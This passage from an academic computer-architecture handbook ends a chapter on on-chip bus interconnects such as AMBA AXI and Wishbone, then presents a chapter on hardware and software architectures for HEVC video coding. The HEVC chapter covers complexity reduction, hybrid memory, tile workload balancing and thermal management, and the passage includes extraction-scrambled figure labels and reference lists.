While there are a number of other busses that exist today, like the Avalon (Intel
Corporation 2022) bus, one of the most popular interconnect types is the ARM
AMBA family of bus interfaces and protocols (ARM Corporation 2024). These
interfaces are royalty-free to use and come in a large variety of interface types (ARM
Corporation 2024). While the basic functions of bus types like the AXI, or Advanced
eXtensible Interface, bus provide similar functionality to the Wishbone bus, the
signals and protocols differ. But, while the basic version of the AMBA AXI version
5 (Issue K) initiator (Manager in AMBA terminology) requires the use of 17 signals
(apart from the clock and reset signals), the optional functions of AXI5 together
contain more than 100 signals. Wishbone, in comparison, has just ten signals for the
initiator, with more than half being optional. There are a number of advanced options
that are supported by the AXI protocol, such as supporting multiple outstanding
transactions and out-of-order completion of transactions (ARM Corporation 2024).
These are significant enhancements, as exploiting MLP to improve performance
and efficiency requires an interconnect that can support these features. A number
of other interesting features are supported by the AMBA AXI protocol, such as
data channels up to 1024 bits wide, atomic memory transactions, and even security
support and coherence support through the CHI, or Coherent Hub Interface.
Interconnect Topologies
Off-Chip Connectivity
References
Alderman R, Amitay Y, Cohan D, Delvaux M, Dolenc M, Hetzer V, Homann M, Hurt B, Kirk
L, Lampret D, Peterson WD, Rice B, Rynearson J, Shamli A, Usselmann R, Unnebäck M,
Serrano J, Wlostowski T (2010) Wishbone system-on-chip (SoC) interconnection architecture
for portable IP cores, version B4
ARM (2024) Trustzone for Cortex-A. https://www.arm.com/technologies/trustzone-for-cortex-a
ARM Corporation (2024) Advanced microcontroller bus architecture (AMBA). https://developer.
arm.com/Architectures/AMBA
212 T. E. Carlson
Carlson TE, Heirman W, Allam O, Kaxiras S, Eeckhout L (2015) The load slice core microarchi-
tecture. In: International symposium on computer architecture (ISCA), pp 272–284
Cho BY, Jung J, Erez M (2021) Accelerating bandwidth-bound deep learning inference with main-
memory accelerators. In: Proceedings of the international conference for high performance
computing, networking, storage and analysis, SC’21. Association for Computing Machinery,
New York
Dennard RH, Gaensslen FH, Yu H, Rideout VL, Bassous E, LeBlanc AR (1974) Design of ion-
implanted MOSFET’s with very small physical dimensions. IEEE J Solid-State Circuits
Esmaeilzadeh H, Blem E, St. Amant R, Sankaralingam K, Burger D (2011) Dark silicon and the
end of multicore scaling. SIGARCH Comput Archit News 39(3):365–376
Glew A (1998) MLP yes! ILP no. ASPLOS Wild and Crazy Idea Session
Intel Corporation (2022) Avalon®interface specifications. https://www.intel.com/content/www/us/
en/docs/programmable/683091/22-3/introduction-to-the-interface-specifications.html
Intel Corporation (2024a) Intel®Xeon®6780E processor. https://ark.intel.com/content/www/us/
en/ark/products/240362/intel-xeon-6780e-processor-108m-cache-2-20-ghz.html
Intel Corporation (2024b) What is Intel®Turbo Boost Technology? https://www.intel.com/content/
www/us/en/gaming/resources/turbo-boost.html
JEDEC (2008) JEDEC standard: Double data rate (DDR) SDRAM, revision JESD79F. https://
www.jedec.org/system/files/docs/JESD79F_0.pdf
JEDEC (2023) JEDEC standard: DDR5 unbuffered dual inline memory module (UDIMM)
common standard, revision JESD308A, version 1.1. https://www.jedec.org/system/files/docs/
JESD308A.pdf
JEDEC (2024) DDR5 SDRAM, revision JESD79-5C.01. https://www.jedec.org
Karkhanis TS, Smith JE (2007) Automated design of application specific superscalar processors:
an analytical approach. SIGARCH Comput Archit News 35(2):402–411
Kroft D (1981) Lockup-free instruction fetch/prefetch cache organization. In: International
Symposium on Computer Architecture (ISCA), pp 81–87
Moore GE (2006) Cramming more components onto integrated circuits, reprinted from electronics.
IEEE Solid-State Circuits Soc Newsl
PCI-SIG. PCI-SIG®announces PCI Express®7.0 specification to reach 128 GT/s. https://www.
businesswire.com/news/home/20220621005137/en
PCI-SIG. PCI-SIG®announces upcoming PCI Express®6.0 specification to reach 64 GT/s. https://
www.businesswire.com/news/home/20190618005945/en/PCI-SIG-Announces-Upcoming-
PCI-Express-6.0-Specification-to-Reach-64-GTs
Shao S, Wang E (2019) Die photo analysis. https://web.archive.org/web/20190518112600/http://
vlsiarch.eecs.harvard.edu/research/accelerators/die-photo-analysis/
Part II
Application-Specific Processors
Architectures for Multimedia Processing:
A Cross-Layer Perspective 7
Muhammad Shafique and Bharath Srinivas Prabakaran
Contents
Introduction and Overview of Video Codecs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
High Efficiency Video Coding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Overview of the Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Analysis of Computational Complexity, Memory Requirements, and
Processor Temperature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220
Hardware and Software Architectures for Video Coding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Complexity Reduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227
Low-Power Memory Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227
Workload Balancing for Multiple Video Tiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Dynamic Thermal Management for HEVC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Future Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
Abstract
M. Shafique ()
Engineering Division, New York University Abu Dhabi, Abu Dhabi, United Arab Emirates
e-mail: [email protected]
B. S. Prabakaran
Institute of Computer Engineering, Technische Universität Wien (TU Wien), Vienna, Austria
e-mail: [email protected]
Keywords
Until the late 1950s, “moving pictures,” or videos, could be stored only as analog
signals in magnetic tapes, which were meant for playback in mechanical or cathode-
ray tube-based (CRT) television (TV) systems. However, with the digital revolution,
new techniques were used to create digital videos, which could not compete with
analog videos of the time due to their infeasibly high bitrate, thereby hindering
their large-scale adoption. The first generation of practical digital videos was made
possible using a lossy compression technique called Discrete Cosine Transform
(DCT). A number of companies including Toshiba and Hitachi used DCT-based
algorithms to develop the first video coding standard, H.261 (Hanzo et al. 2007).
Since then, DCT has been a major component of all video coding standards that
followed the H.261, including the latest H.266 or Versatile Video Coding (VVC)
standard (Wien and Bross 2020), established in 2020.
Even though ultra-high-definition, or 4K, is expected to be the next video
standard for broadcasting services, the current generation of TV systems, from
manufacturers like Samsung and LG, can already display up to 12K resolution
videos. These videos require massive amounts of memory and bandwidth, in RAW
formats, which make them unsuitable as a standard for video streaming or television
broadcasting services. Figure 1 illustrates an overview of rising video resolutions
and their corresponding memory requirement per frame in RAW format. 16K
resolution videos, on average, require more than 12 million bytes per frame, which
leads to the generation of over 3.3 GB of data for a 10-s video at 30 frames per
second (FPS). Therefore, each new video coding standard is expected to achieve a
higher level of compression to ensure that higher-resolution videos can be streamed
on demand, over the Internet, or for broadcasting TV programs. The H.264 standard
or Advanced Video Coding (AVC), which is currently the most-used video codec
with a market share of 91% (Bitmovin 2019), was successful in reducing the bitrate
by 2× when compared to its predecessor, H.263, while supporting only up to 4K
resolution videos. Similarly, H.265, or High Efficiency Video Coding (HEVC),
and VVC were able to further achieve ~2× compression in comparison to their
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 217
[×103] [×10]
18
16
16000
Width Height 12 120000000
14
14000
100000000
Height [#Pixels]
Width [#Pixels]
12
12000
10
10000
8 80000000
8
8000
60000000
6
6000
4 40000000
4
4000
20000000
2
2000
0 0 0 0
Fig. 1 Illustration of quadratically increasing memory per frame for common video resolutions
Media 70
70 Social Networking
6.1%
60
60
Gaming 50
50
8.0% Video
Streaming 40
40
Video Applications
13.1% 60.6% 30
30
Web 20
20
Browsing
10
10
00
Fig. 2 An overview of the application category breakdown of global Internet traffic and mobile
data volume (based on the data reported in Statista Research Department 2021 and Sandvine 2019)
HEVC is the successor to the widely used AVC, which can achieve up to 2× better
data compression or substantially improved bitrate at the same file size. The changes
to HEVC include expansion of Coding Tree Units (CTUs) (the individual sub-
blocks of each frame that are used for pattern and difference comparison) from
16 × 16 to 64 × 64 pixels, improved motion compensation and motion estimation,
and improved variable block segmentation (Shafique and Henkel 2014). Figure 3
provides an overview of the HEVC standard and the associated operations involved
in each stage. A key operation of HEVC is hybrid encoding, which involves
exploiting input data redundancy by identifying inter-frame (spatial) and intra-
frame (temporal) correlations using the prediction block to compress the input video
stream. The I-frame, initial frame of the input stream, is encoded solely using
spatial correlations and acts as a reference for future inter-frame predictions. The
sum-of-absolute-difference (SAD) values for each CTU, with respect to their inter-
frame and intra-frame correlations, are computed to estimate the motion vector,
which can then be used for motion estimation (ME) and motion compensation. The
motion vector is subsequently scaled, quantized, and transformed using the Context
Adaptive Binary Arithmetic Entropy Encoder, which is transmitted to the decoder,
along with the prediction information and the partitioning scheme. The picture is
reconstructed by reducing the blocking artifacts using the deblocking and sample
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 219
Prediction/Coding Units
Inter-fram Prediction
Inter-frame
Recursive Block
Predic
Prediction Block
Size Reduction
Intra-fram Prediction
Intra-frame Coding Tree Units
Input Video as
Coding Tree Units Bitstream Transform &
Headers - Quantization
Fig. 3 Overview of the High Efficiency Video Coding (HEVC) Standard (see more details
in Sullivan et al. 2012)
adaptive offset filter. The picture is subsequently stored in buffers to aid in motion-
vector predictions.
Similar to the 16 × 16 blocks in AVC, HEVC deploys analogous Coding Tree
Units (CTUs) composed of luma and chroma Coded Tree Blocks (CTBs). As
discussed earlier, CTBs can have dimensions ranging from 16 × 16 up to 64 × 64 to
ensure larger resolution video streams can be compressed appropriately. The CTBs
are recursively partitioned using a quadtree structure, where each root is associated
with a Coding Unit (CU), which is also partitioned into multiple Prediction (PU)
and Transform Units (TU), based on whether the algorithm decides to use inter-
or intra-frame prediction to encode the frame. Figure 4a illustrates an overview of
the CTU partitioning into CUs, PUs, and TUs. Partitioning into PUs and TUs, or
even further partitioning, may be performed at the CU level to further compress the
videos. The dimensions of PU and TU can range from 64 × 64 to 4 × 4 and 32 × 32
to 4 × 4, respectively. HEVC also deploys Rate Distortion Optimization (RDO),
which evaluates all combinations of CU, PU, and TU to determine the optimal
partitioning that can achieve high compression efficiency. Each PU is evaluated
for the 35 different intra-frame prediction modes, which are used to effectively
eliminate spatial redundancy. The best prediction mode is selected by HEVC after
the RDO decision at the cost of higher computational load caused by the increased
search space.
220 M. Shafique and B. S. Prabakaran
Fig. 4 (a) Quadtree partitioning of Coding Tree Units in HEVC; (b) Example of slices and tiles
of a frame in HEVC for error resilience and parallel processing, respectively
However, the most complex processing stage in HEVC is the inter-frame pre-
diction block, which is composed of motion estimation and motion compensation.
This stage employs two interpolation filters that are responsible for quarter-sample
precision motion compensation and fractional-pixel motion estimation. In the
motion estimation stage of HEVC, the algorithm searches for a block inside the
search window of the reference frame, using the SAD value to identify the motion
vector. The reference frame is either stored on-chip or off-chip based on the quality-
of-service requirements of the application and associated system constraints. This
stage is highly memory-intensive and accounts for nearly 70% of the total energy
consumed by the ME stage of HEVC (Sampaio et al. 2014).
To ensure higher error resilience, a frame can be divided into several slices
(sequences of CTUs), which are raster scanned while ensuring that the predictions
are not performed across slice boundaries. Tiles, on the other hand, are responsible
for enabling parallel processing without any thread or workload synchronization.
Figure 4b illustrates an example of slices and tiles on a video frame. Each tile is
a rectangular group of CTUs, which can be independently processed on different
cores of a processor without any interdependencies. However, since different
CTUs of an image can vary in terms of composition and motion properties, the
workload of each core may increase or decrease based on the tile assigned to the
core. Therefore, the partitioning, mapping, and processing of tiles on cores and
accelerators while considering the workload and its computational complexity and
memory requirements are quite instrumental to the development of energy-efficient
architectures and platforms.
The total number of predictions (β) for a CTU of dimensions M × M, provided that
a CTU is partitioned into multiple CUs, is defined as:
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 221
(a) (b)
100 832x480 1920x1080 2560x1600
QP:
{22, 30, 38}
PU ranges
64x64
50
32x32
16x16
8x8
Fig. 5 (a) Illustration of the PUs on the initial frame of a template sequence; (b) percentage of
image area occupied by given PU dimensions for different videos and quantization parameter
values
log 2(M)−2
β= 22i × Ni (1)
i=0
where Ni can either denote the total number of candidates for motion search of CU
size i or the total number of intra-frame prediction modes evaluated for the CTU.
And as discussed earlier, all possible combinations of PUs are evaluated to identify
the best CU structure for the CTU under consideration, due to the RDO. The 64×64
block structure of the CTU results in 7808 predictions for the intra-frame prediction
process, which translates to roughly 2.65× the number of predictions in AVC.
Figure 5a illustrates the partitioning of the initial frame of a template sequence after
the RDO stage in HEVC. The figure clearly identifies that larger PU dimensions are
used for encoding low variance and homogeneous regions, whereas smaller blocks
are used to encode high variance and heterogeneous regions. Figure 5b provides
a more comprehensive breakdown of the percentage of image area occupied by
different PU dimensions, quantization parameter (QP) values, and video sequences.
At lower quantization levels, the texture and variations are more comprehensively
captured using smaller PU blocks, with little to no large-sized PUs. Increasing
the QP value, on the other hand, introduces a level of smoothing that reduces the
quality of the image by increasing the number of large-sized PUs. This observation
can be leveraged to research and develop an application-level complexity reduction
technique that can reduce the hardware overhead of HEVC.
Vanne et al. (2012) and Bossen et al. (2012) have performed a comprehensive
complexity analysis of the HEVC system to identify that three interpolation filters
are responsible for 15%–38% of the total time required for encoding and decoding.
These three filters are used to generate the half- and quarter-position pixels of luma
and chroma eighth-pixels of the frame. Figure 6a illustrates that the interpolation
filters, on average, consume 25% of the total execution time of the system, which
varies depending upon the quantization parameter and the characteristics of the
video sequence under consideration. Figure 6b also illustrates the variation in the
222 M. Shafique and B. S. Prabakaran
20
10
0
22 27 32 37
Quantization Parameter (QP)
8
6
4
2
0
00 20 40
40 60 80
80 100 120
120 140 160
160
Frame number in video sequence
Fig. 6 (a) Percentage execution time of interpolation filter in HEVC encoder; (b) number of calls
to the interpolation filter for each frame in two different video sequences. (Adapted from Shafique
and Henkel 2014)
number of calls to the interpolation filters for two different video sequences, thereby
motivating the need for interpolation filters that adapt with respect to the video
sequence’s properties.
Similar to their high computation load, the memory bandwidth of HEVC systems
is, on average, 2× more when compared to the H.264 encoder, as illustrated in
Fig. 7a. The box plots illustrated in Fig. 7b also denote the summary of memory
access percentages for three different search window sizes (32 × 32, 64 × 64,
and 128 × 128) and four video sequences. Based on this analysis, the estimated
number of memory accesses of the HEVC encoder system is ~3.86× more than
that of AVC. Therefore, the HEVC encoder requires more memory bandwidth and
memory accesses, thereby exerting higher pressure on the memory architecture
when compared to AVC, which is due to the quadtree partitioning of CTUs
into multiple CUs and the video tiling processes that enable parallel processing.
Figure 7b also illustrates that variation in percentage of memory accesses for
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 223
(b)
(a) 100 Maximum
Memory Bandwidth [GB/s]
3 Percentage of memory
AVC accesses for TZ Search
2 HEVC
50
1
75 %
Median
0
HD FHD 2K Minimum 25 %
Video Resolution 0
Keiba Basketball Racehorse Kristen
Fig. 7 (a) Memory bandwidth requirement for the HEVC and AVC encoder systems; (b)
percentage statistics of block matching memory accesses for TZ search in HEVC. (Adapted
from Shafique and Henkel 2014)
Fig. 8 (a) Variation in processor temperature of two different video sequences; (b) processor
temperature analysis using frequency scaling on low motion sequence; (c) temperature analysis
of processor using video tiling and execution on two cores. (Adapted from Shafique and Henkel
2014)
Memory Bus
Monitors
R R R Processor Core Hardware Monitors Processor Core
platform and quality constraints of the system, like the frame rate (Grellert et al.
2013). This is followed by the execution of various power management algorithms,
which are used to curtail the computations of the workload and/or to identify the
correct mode of operation and system configuration of the HEVC encoder that
satisfies the requirements and constraints, such as the energy budget of a battery-
operated device, while ensuring minimal quality loss (Khan et al. 2013a,b). Khan
et al. (2014) have also proposed a video tile formation technique, which enacts
intricate policies to ensure that the generated workload is balanced over different
compute tiles (see Fig. 9 for more details).
At the hardware layer, a heterogeneous many-core architecture is envisioned
where each core is denoted as a compute tile and is composed of (1) at least one
general purpose microprocessor, which can execute the HEVC encoder software
stack, (2) multiple hardware accelerators, like SAD arrays, interpolation filters,
prediction blocks, etc. to ensure real-time processing and throughput (Diniz et al.
2013; Khan et al. 2013a,b; Sampaio et al. 2014; Zatt et al. 2011b), that are inter-
twined as co-processors on the compute tile (Diniz et al. 2013), (3) video memories
with data-aware dynamic power management (DPM) capabilities (Sampaio et al.
2014; Khan et al. 2013b). Figure 10 illustrates the hardware requirements for the
interpolation filters of HEVC by synthesizing them on the Xilinx XC5VLX110T-
2ff1136 FPGA. The hardware techniques investigated in Sampaio et al. (2014)
and Khan et al. (2013b) shift the control and power management system to the
software and application layer. The software layer is supplemented with run-time
hardware measures like the frame rate, throughput, and power consumption, thereby
enabling workload budgeting, complexity reduction, energy-quality trade-off, etc.
The inherent error resilience of the video coding application has also been exploited
to design approximate accelerators for motion estimation (El-Harouni et al. 2017)
and STT-RAM-based memory hierarchies (Sampaio et al. 2015; Teimoori et al.
2018) to achieve high energy efficiency.
200
0
1 2 3 4 5 6
Number of Parallel Datapaths
Fig. 10 Hardware results for interpolation filters on Xilinx FPGA for varying number of datapaths
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 227
Complexity Reduction
Limiting the total number of partitions for CU can drastically reduce the complexity
of the HEVC encoder. Based on a preliminary analysis of input video stream that
identifies the variance properties of different object, the approach successfully deter-
mines a set of CU sizes most suitable for the scenario, thereby reducing the overhead
of the full RDO mode decision. Based on the preliminary analysis illustrated
in section “Analysis of Computational Complexity, Memory Requirements, and
Processor Temperature”, which discussed the dependence of CU dimensions on the
variance of the input stream, a variance-aware CU/PU mode prediction technique
has been developed. Initially, the variance of the CTU, at the 4 × 4 sublevel,
is estimated. This information is used to recursively merge similar neighboring
blocks, based on their variance, to create bigger blocks and partitions. This process
is repeated until the point where there are no more blocks left to be merged, at
which point we are left with a “PU Map,” which is used for evaluating the PU size
predictions. This also eliminates the need for multiple CU/PU dimension evaluation
as the PU map dimension evaluations prove to be sufficient in most cases. To further
lower the risk of misprediction, additional PU map is generated, “PU Map Above,”
which denotes the PU map a level above the current node in the quadtree partitioning
structure, as shown in Fig. 11. The approach is successful in achieving a speedup
of 44%, on average, and energy reductions of 35% while incurring a negligible
loss of −0.048 dB output quality (BD-PSNR (Bjontegaard 2001)). This complexity
reduction technique is orthogonal to other complexity reduction mechanisms like
early-stage TU/PU partitioning and intra-frame angular direction prediction.
Fig. 11 Overview of the approach used to select the best CU dimensions and locations
228 M. Shafique and B. S. Prabakaran
input video streams. For instance, large reference video frames are repeatedly
loaded to on-chip memory during the motion search process, which leads to large
power consumption of the on-chip memories and the power consumption caused
by repeated memory accesses. These problems can be either addressed by (1)
reducing the number of repeated off-chip memory accesses by exploring effective
data reuse technique, motion trajectory prediction, which can be exploited to design
and manage application-specific on-chip memories (Sampaio et al. 2014; Shafique
and Henkel 2011; Zatt et al. 2011a,b), or (2) leveraging next-generation memory
technologies that overcome the volatility limitations of SRAM, such as MRAM,
which drastically reduce the leakage power of the cell by ~5.4× while incurring a
2.6× higher write latency and nearly 20× higher dynamic power during the write
cycle.
Instead of exploring these two approaches individually, Khan et al. (2013b)
proposed to combine the benefits of both approaches by designing a hybrid memory
architecture that combines SRAM and NVMs with adaptive energy management
system called AMBER, as illustrated in Fig. 12a. To enable low read latency of
CTUs and hide the incredibly long latency of MRAM writes, a small SRAM-
based memory is included on-chip. The CTUs fetched from off-chip memory are
simultaneously written to the SRAM-based memory and MRAM, which can be
subsequently used for repeated future accesses during the motion estimation stage.
The MRAM buffers are divided into multiple sectors on the chip, which can be
individually clock-/power-gated based on the memory requirement of the video
stream/application, to reduce power consumption. Due to its non-volatility, MRAMs
retain the data when power-gated, making them highly suitable for such hybrid
memory architectures. The proposed power manager is a self-organizing map-
based learner, which adapts itself, without any supervision, to changing memory
patterns and effectively reduces power consumption when compared to the state
of the art, as illustrated in Fig. 12b. However, since AMBER does not support
the bandwidth required for processing multiple tiles in parallel with concurrent
memory access, Sampaio et al. (2014) proposed a distributed scratchpad-based
video memory for HEVC. This technique employs a data-driven dynamic power
management tool that reduces energy consumption by up to 61% compared to
(b)
HEVC Encoder AMBER Power Consumption [W]
Normally Always
2
Power Control Unit
OFF ON
Search Window
Accelerators for 1.5
MRAM SRAM AMBER 4 Ref. frames
off-chip data fetch 1
0.5
HEVC Block
DRAM 0
Matching
Fig. 12 (a) Overview of the proposed AMBER memory system; (b) illustration of power savings
achieved by the AMBER system
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 229
state-of-the-art solutions while also reducing the on-chip energy leakage by 54%
by incorporating the application-specific knowledge.
180
Workload is not constant (a)
for each tile and changing
Time [msec]
140
Tile 0 Tile 1
Tile 3 Tile 4 Frame
100
1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31 33 35 37 39 41 43 45 47 49
(c) (d)
5.5 30 4.2 40
5 Frequency Frequency
4.5 Modes 25
3.2
32
4 20
3.5 24
Kbytes
Bytes Modes
Modes
GHz
3 15 2.2
Kbytes
Modes
2.5 16
GHz
2 10
1.2
1.5 5 Bytes 8
1
0.5 0 0.2 0
0 5 10 15 20 25 30 35 40 45 0 5 10 15 20 25 30 35 40 45
Fig. 13 (a) Time required for processing each tile with four tiles per frame using the
RaceHorses; (b) the adaptive workload balancing technique for many-core processors;
(c) adaptation analysis for two different tiles in Exit. (Adapted from the data presented
in Shafique and Henkel 2014)
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 231
55 120
PSNR/Bitrate
100
50 80
60
45 40
20
40 0
No DTM DTM 54˚C DTM 50˚C DTM 46˚C
60 60
Peak temperature (ºC)
55 55
50 50
45 45
No DTM DTM 54ºC No DTM DTM 54ºC
DTM 50ºC DTM 46ºC DTM 50ºC DTM 46ºC
40 40
0 10 20 0 10 20
# Frames # Frames
Fig. 14 (a) Maximum, average, and minimum processor temperature for encoding Keiba; (b)
comparison of temperature profile for DTM and non-DTM approaches. (Adapted from Shafique
and Henkel 2014)
232 M. Shafique and B. S. Prabakaran
Future Directions
Since its inception, “moving pictures” have been consumed by users in a variety of
ways, starting from film projectors in the 1900s all the way up to in-home streaming
using on-demand over-the-top (OTT) media service providers like Netflix, YouTube,
Amazon Prime, etc. These OTT ventures, which were growing steadily due to their
on-demand accessibility and comfort of home use, started registering exponential
growth when the COVID-19 pandemic hit and people were confined to their homes
without any other entertainment options (World Health Organization 2021). For
instance, the number of paid OTT subscribers in India increased by 30% to more
than 30 million in a span of 5 months, from March to July 2020, when lockdown
was instituted in the country (Financial Express 2020). Similar trends were observed
in almost all the countries where extended periods of lockdown were instituted in
order to reduce the spread of the novel coronavirus (Matthew Ball 2020). These
OTT ventures, which rely on H.264 and HEVC video standards to transmit the high-
resolution videos, require hardware-level acceleration support and high bandwidth
requirements to enable real-time streaming, as discussed in section “Introduction
and Overview of Video Codecs”. These requirements are increasingly important
when the next generation of video coding standards is devised as they are likely to
require higher computational power and bandwidth requirements, such as the VVC
standard.
Besides on-demand entertainment, videos are dominating domains like virtual
and augmented reality, which are encoded to achieve 360-degree videos (Bross
et al. 2021; Zhou et al. 2019), gaming (Zadtootaghaj et al. 2018), video confer-
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 233
encing (Wang et al. 2021), and many other applications. Each of these applications
is accompanied by research challenges highly specific to the application use case.
For example, the hardware resources available on the VR headset should be capable
of rendering 360-degree 4K resolution videos at 60+ FPS in real time while being
compact and not consume too much power or generate a lot of heat, which can
cause discomfort to the user. Similarly, the quality and frame rate requirement
of online gaming platforms are satisfied using specialized Graphics Processing
Units (GPUs), which can handle the memory bandwidth and highly parallelized
compute requirements of sophisticated gameplay that changes in real time based
on user controls. The next steps to realize such ventures would be to investigate,
research, and develop hardware-software solutions to meet the requirements of such
use cases, potentially using a modified version of the methodology presented in
section “Hardware and Software Architectures for Video Coding”.
More recently, quite a few of the scientific advancements in computing, like
near-memory computing (Singh et al. 2019) and deep learning (LeCun et al.
2015), have also had major impacts on the video coding domain, which have
furthered capabilities across various computing fields. Lesniak et al. (2021) have
proposed a novel high-bandwidth memory (HBM) interfaced processor architecture
that can enable hardware-accelerated execution for applications like video coding
and encryption, which require high memory bandwidth. Besides HBMs, Resistive
Random-access Memories (ReRAM) and associated cross-bar architectures have
proven to be quite beneficial in performing in-memory computing for large-
scale data processing applications like deep learning (Chi et al. 2016). These
architectures could also be quite useful for video coding applications once the cost
and performance benefits associated with their fabrication and their data reliability
challenges are addressed.
Likewise, the deep learning paradigm has enabled a whole sleuth of advances
in the computer vision domains, which has enabled a wide range of features in
autonomous driving, robotics, etc. For instance, Deep Neural Networks have proven
to be state of the art in Computer Vision (like image detection, recognition, and
segmentation), Natural Language Processing (like speech recognition, machine
translation, and sentiment analysis), Medical Assistance (tumor segmentation,
diagnostics, and drug discovery), and many other applications. Deep learning has
also invaded the video coding domain; Wang et al. (2021) have leveraged the
capabilities of Deep Neural Networks and their proposed keypoint representation
technique to reduce the bandwidth requirement for video conferencing applications
by 10×, when compared to the H.264 video coding standard. Their technique can
also be used to synthesize a pseudo-realistic face-to-face experience during video
conferencing.
Therefore, it is in the best interest of researchers worldwide to investigate
novel and upcoming scientific advancements to address the challenges associated
with the video coding domain and its applications in fields like video archiving,
OTT content streaming, video surveillance, computer vision, robotics, autonomous
driving, human-computer interaction, etc. to improve the quality of service.
234 M. Shafique and B. S. Prabakaran
Conclusions
Acknowledgments We would like to explicitly thank Felipe Sampaio, Bruno Zatt, Sergio Bampi,
Daniel Palomino, Muhammad Usman Karim Khan, and Jörg Henkel for their contributions to
parts of the works cited in this chapter. We would also like to thank other researchers in industry
and academic alike, especially the ones cited in this work, who contributed to this field to enable
advancements that helped us realize the potential of video coding across multiple domains.
References
Bitmovin (2019) Video developer report. https://bitmovin.com/bitmovin-2019-video-developer-
report-av1-codec-ai-machine-learning-low-latency/
Bjontegaard G (2001) Calculation of average PSNR differences between RD-curves. VCEG-M33
Bossen F, Bross B, Suhring K, Flynn D (2012) HEVC complexity and implementation analysis.
IEEE Trans Circuits Syst Video Technol 22(12):1685–1696
Bross B, Chen J, Ohm JR, Sullivan GJ, Wang YK (2021) Developments in international video
coding standardization after AVC, with an overview of versatile video coding (VVC). In:
Proceedings of the IEEE
Chi P, Li S, Xu C, Zhang T, Zhao J, Liu Y, Wang Y, Xie Y (2016) Prime: a novel processing-
in-memory architecture for neural network computation in reram-based main memory. ACM
SIGARCH Comput Archit News 44(3):27–39
Diniz CM, Shafique M, Bampi S, Henkel J (2013) High-throughput interpolation hardware archi-
tecture with coarse-grained reconfigurable datapaths for HEVC. In: 2013 IEEE international
conference on image processing. IEEE, pp 2091–2095
El-Harouni W, Rehman S, Prabakaran BS, Kumar A, Hafiz R, Shafique M (2017) Embracing
approximate computing for energy-efficient motion estimation in high efficiency video coding.
In: Design, automation & test in Europe conference & exhibition (DATE), 2017. IEEE,
pp 1384–1389
Financial Express (2020) Rise of paid subscribers. https://www.financialexpress.com/brandwagon/
2020-rise-of-paid-subscribers/2172942/
Grellert M, Shafique M, Khan MUK, Agostini L, Mattos JC, Henkel J (2013) An adaptive workload
management scheme for HEVC encoding. In: 2013 IEEE international conference on image
processing. IEEE, pp 1850–1854
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 235
Hanzo L, Cherriman P, Streit J (2007) Video compression and communications: from basics to H.
261, H. 263, H. 264, MPEG4 for DVB and HSDPA-style adaptive turbo-transceivers. Wiley,
Hoboken
Javaid H, Shafique M, Parameswaran S, Henkel J (2011) Low-power adaptive pipelined mpsocs
for multimedia: an H. 264 video encoder case study. In: 2011 48th ACM/EDAC/IEEE design
automation conference (DAC). IEEE, pp 1032–1037
Khan MUK, Shafique M, Grellert M, Henkel J (2013a) Hardware-software collaborative complex-
ity reduction scheme for the emerging HEVC intra encoder. In: 2013 design, automation & test
in Europe conference & exhibition (DATE). IEEE, pp 125–128
Khan MUK, Shafique M, Henkel J (2013b) An adaptive complexity reduction scheme with fast
prediction unit decision for HEVC intra encoding. In: 2013 IEEE international conference on
image processing. IEEE, pp 1578–1582
Khan MUK, Shafique M, Henkel J (2014) Software architecture of high efficiency video coding
for many-core systems with power-efficient workload balancing. In: 2014 design, automation
& test in Europe conference & exhibition (DATE). IEEE, pp 1–6
Khan MUK, Shafique M, Bauer L, Henkel J (2015) Multicast fullhd H. 264 intra video encoder
architecture. IEEE Trans Comput-Aided Des Integr Circuits Syst 34(12):2049–2053
Khan MUK, Shafique M, Henkel J (2017) Energy efficient embedded video processing systems: a
hardware-software collaborative approach. Springer, Berlin
LeCun Y, Bengio Y, Hinton G (2015) Deep learning. Nature 521(7553):436–444
Lesniak F, Kreß F, Becker J (2021) Transparent near-memory computing with a reconfigurable
processor. In: International symposium on applied reconfigurable computing. Springer, pp 221–
231
Matthew Ball (2020) The impact of COVID-19 on pay-tv and ott video. https://www.matthewball.
vc/all/covidvideo
Palomino D, Shafique M, Amrouch H, Susin A, Henkel J (2014) HEVCDTM: application-driven
dynamic thermal management for high efficiency video coding. In: 2014 design, automation &
test in Europe conference & exhibition (DATE). IEEE, pp 1–4
Sampaio F, Zatt B, Shafique M, Agostini L, Henkel J, Bampi S (2013) Content-adaptive reference
